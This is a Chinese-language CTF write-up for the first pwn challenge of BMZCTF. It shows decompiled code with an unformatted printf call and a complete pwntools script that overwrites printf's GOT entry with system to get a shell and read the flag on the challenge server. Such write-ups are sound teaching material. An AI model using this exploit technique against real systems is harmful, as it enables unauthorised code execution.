昨天整了第一届BMZCTF的pwn题,都来得及写。这一届一共五个pwn题,难度逐个增加。
第一个是个32位no pie,got表可写。程序很短,直接调用无格式参数的printf,而且有循环,got表还有system项。基本属于无障碍型。
int __cdecl __noreturn main(int argc, const char **argv, const char **envp)
{
char s[100]; // [esp+18h] [ebp-70h] BYREF
unsigned int v4; // [esp+7Ch] [ebp-Ch]
v4 = __readgsdword(0x14u);
init();
menu();
puts(" Wealcome to BMZCTF ");
while ( 1 )
{
memset(s, 0, sizeof(s));
read(0, s, 0x64u);
printf(s);
}
}
思路就是
先用AAAA-%X-%X-%X....得到偏移10
然后直接用fmtstr_payload工具生成串,将printf的got表内容改为plt[system]
最后再发送/bin/sh让printf执行system(/bin/sh)
from pwn import *
local = 0
if local == 1:
p = process('./pwn')
else:
p = remote('www.bmzclub.cn', 21355)
elf = ELF('./pwn')
context(arch = 'i386', log_level = 'debug') #
payload = fmtstr_payload(10, {elf.got['printf']: elf.plt['system']})
p.sendline(payload)
p.sendline(b'/bin/sh\x00')
p.sendline(b'cat /flag')
p.interactive()